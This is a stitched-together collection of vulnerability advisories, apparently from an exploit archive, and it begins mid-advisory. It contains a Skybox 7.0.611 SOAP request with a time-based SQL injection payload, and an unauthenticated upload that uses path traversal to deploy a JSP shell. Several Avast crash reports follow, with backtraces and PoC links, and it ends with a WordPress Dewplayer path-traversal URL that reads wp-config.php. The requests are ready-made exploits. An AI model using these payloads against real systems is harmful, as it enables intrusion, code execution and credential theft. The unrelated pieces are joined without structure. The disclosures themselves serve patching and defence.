demonstrates this issue with a simple sleep statement: POST https://localhost:8443/skyboxview/webservice/services/VersionWebService HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 619 Host: localhost:8443 Connection: Keep-Alive User-Agent: Apache-HttpClient/4.1.1 (java 1.5) <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ver="http://com/skybox/view/webservice/version"> <soapenv:Header/> <soapenv:Body> <ver:getUserLockInSeconds soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <username xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">admin&apos;+(select * from (select(sleep(20)))a)+&apos;</username> </ver:getUserLockInSeconds> </soapenv:Body> </soapenv:Envelope> No authentication is required to exploit this vulnerability. 5) Remote Unauthenticated Code Execution It is possible to upload WAR files, containing for example JSP files, which will be automatically deployed by the Skybox appliance. This way, it is possible to upload a JSP shell which enables an attacker to execute arbitrary commands running in the same context as the web server running (by default skyboxview). The following request to the Skyboxview update service (located at https://localhost:9443) uploads a JSP file. It will be uploaded to /opt/skyboxview/thirdparty/jboss/server/web/deploy where it is automatically extracted and deployed at /opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost. POST /skyboxview-softwareupdate/services/CollectorSoftwareUpdate HTTP/1.1 Accept-Encoding: gzip,deflate SOAPAction: "" Content-Type: multipart/related; type="text/xml"; start="<rootpart@soapui.org>"; boundary="----=_Part_1_1636307031.1418103287783" MIME-Version: 1.0 User-Agent: Jakarta Commons-HttpClient/3.1 Host: localhost:9443 Content-Length: 1944 ------=_Part_1_1636307031.1418103287783 Content-Type: text/xml; charset=UTF-8 Content-Transfer-Encoding: 8bit Content-ID: <rootpart@soapui.org> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sof="http://com/skybox/view/agent/webservice/softwareupdate"> <soapenv:Header/> <soapenv:Body> <sof:uploadPatch soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <patchName xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">../../thirdparty/jbos s/server/web/deploy/helloworld2.war</patchName> <patchData href="cid:helloworld.war"/> </sof:uploadPatch> </soapenv:Body> </soapenv:Envelope> ------=_Part_1_1636307031.1418103287783 Content-Type: application/octet-stream; name=helloworld.war Content-Transfer-Encoding: binary Content-ID: <helloworld.war> Content-Disposition: attachment; name="helloworld.war"; filename="helloworld.wa r" [binary] Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in the Skybox platform version 7.0.611, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ Communication with the vendor was handled by SEC Consult's client. Solution: --------- According to the release-notes, the issues have been fixed in the following versions (reference number "19184"): 7.5.401: Reflected Cross-site scripting vulnerabilities 7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and Directory Traversal Users of Skybox are advised to upgrade to version 7.5.401 or higher. Workaround: ----------- None Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF M. Heinzl/ @2015

Source: https://code.google.com/p/google-security-research/issues/detail?id=554 The attached PEncrypt packed executable causes an OOB write on Avast Server Edition. (gdb) bt #0 0xf6f5e64a in EmulatePolyCode(_POLY_INFO*, int) () from /proc/self/cwd/defs/15092301/engine.so #1 0xf6f7d334 in pencryptMaybeUnpack(CFMap&, _PEEXE_INFO*, asw::root::CGenericFile*, _EXE_UNPACK_INFO*) () from /proc/self/cwd/defs/15092301/engine.so #2 0xf6f75805 in CPackWinExec::packIsPacked(CFMap&, void**, ARCHIVE_UNPACKING_INFO*) () from /proc/self/cwd/defs/15092301/engine.so #3 0xf6e8d1a2 in CAllPackers::IsPacked(CFMap&, _SARCHIVERANGE*, unsigned int, unsigned int, unsigned int, unsigned int, CObjectName const*, unsigned int*, unsigned int*, _PEEXE_INFO**) () from /proc/self/cwd/defs/15092301/engine.so #4 0xf6e784ef in CScanInfo::ProcessPackingReal(CObjectName&, CFMap&, _VIRUSDATAARRAY*, int&, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so #5 0xf6e78bdd in CScanInfo::ProcessPacking(CObjectName&, unsigned int, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so #6 0xf6e74fbd in CScanInfo::ProcessArea(CObjectName&, unsigned int, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so #7 0xf6e752af in CScanInfo::ProcessTopArea(CObjectName&, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so #8 0xf6e7d6db in avfilesScanRealMulti () from /proc/self/cwd/defs/15092301/engine.so #9 0xf6e81915 in avfilesScanReal () from /proc/self/cwd/defs/15092301/engine.so #10 0x0805d2a5 in avfilesScanReal () #11 0x0805498c in engine_scan () (gdb) x/i $pc => 0xf6f5e64a <_Z15EmulatePolyCodeP10_POLY_INFOi+7194>: mov WORD PTR [edx],ax (gdb) p/x $edx $7 = 0xe73f181f (gdb) p/x $ax $8 = 0x1060 Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38931.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=550 The attached file crashes in CmdExtract::UnstoreFile because the signed int64 DestUnpSize is truncated to an unsigned 32bit integer. Perhaps CmdExtract::ExtractCurrentFile should sanity check Arc.FileHead.UnpSize early. I observed this crash in Avast Antivirus, but the origin of the code appears to be the unrar source distribution. I imagine many other antiviruses will be affected, and presumably WinRAR and other archivers. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38930.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=551 The attached Microsoft Access Database causes JetDb::IsExploited4x to be called, which contains an unbounded search for objects. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38932.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=552 Trivial fuzzing of molebox archives revealed a heap overflow decrypting the packed image in moleboxMaybeUnpack. This vulnerability is obviously exploitable for remote arbitrary code execution as NT AUTHORITY\SYSTEM. The attached testcase should cause heap corruption in AvastSvc.exe, please enable page heap if you have trouble reproducing. HEAP[AvastSvc.exe]: ZwAllocateVirtualMemory failed c0000018 for heap 00310000 (base 0E560000, size 0006B000) (474.9f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0e5cb478 ebx=0dd70000 ecx=0000d87f edx=0e55f080 esi=00310000 edi=00003bf8 eip=7731836b esp=0be6d338 ebp=0be6d364 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 ntdll!RtlpDeCommitFreeBlock+0x146: 7731836b 80780703 cmp byte ptr [eax+7],3 ds:002b:0e5cb47f=?? #0 0xf702d588 in asw::root::NewDesCryptBlock(unsigned char*, unsigned int, unsigned char const*, bool, int) () #1 0xf702b009 in Mole_DecryptBuffer () from /proc/self/cwd/defs/15092301/engine.so #2 0xf6f6a124 in moleboxMaybeUnpack(CFMap&, _PEEXE_INFO*, asw::root::CGenericFile*, _EXE_UNPACK_INFO*) () #3 0xf6f7630d in CPackWinExec::packGetNext(void*, ARCHIVED_FILE_INFO*) () #4 0xf6e8cdf3 in CAllPackers::GetNext(unsigned int, void*, ARCHIVED_FILE_INFO*) () #5 0xf6e76fc9 in CScanInfo::ProcessPackingReal(CObjectName&, CFMap&, _VIRUSDATAARRAY*, int&, unsigned int) () #6 0xf6e78bdd in CScanInfo::ProcessPacking(CObjectName&, unsigned int, unsigned int) () #7 0xf6e74fbd in CScanInfo::ProcessArea(CObjectName&, unsigned int, unsigned int) () #8 0xf6e752af in CScanInfo::ProcessTopArea(CObjectName&, unsigned int) () #9 0xf6e7d6db in avfilesScanRealMulti () #10 0xf6e81915 in avfilesScanReal () #11 0x0805d2a5 in avfilesScanReal () #12 0x0805498c in engine_scan () Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38933.zip

source: https://www.securityfocus.com/bid/64587/info The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php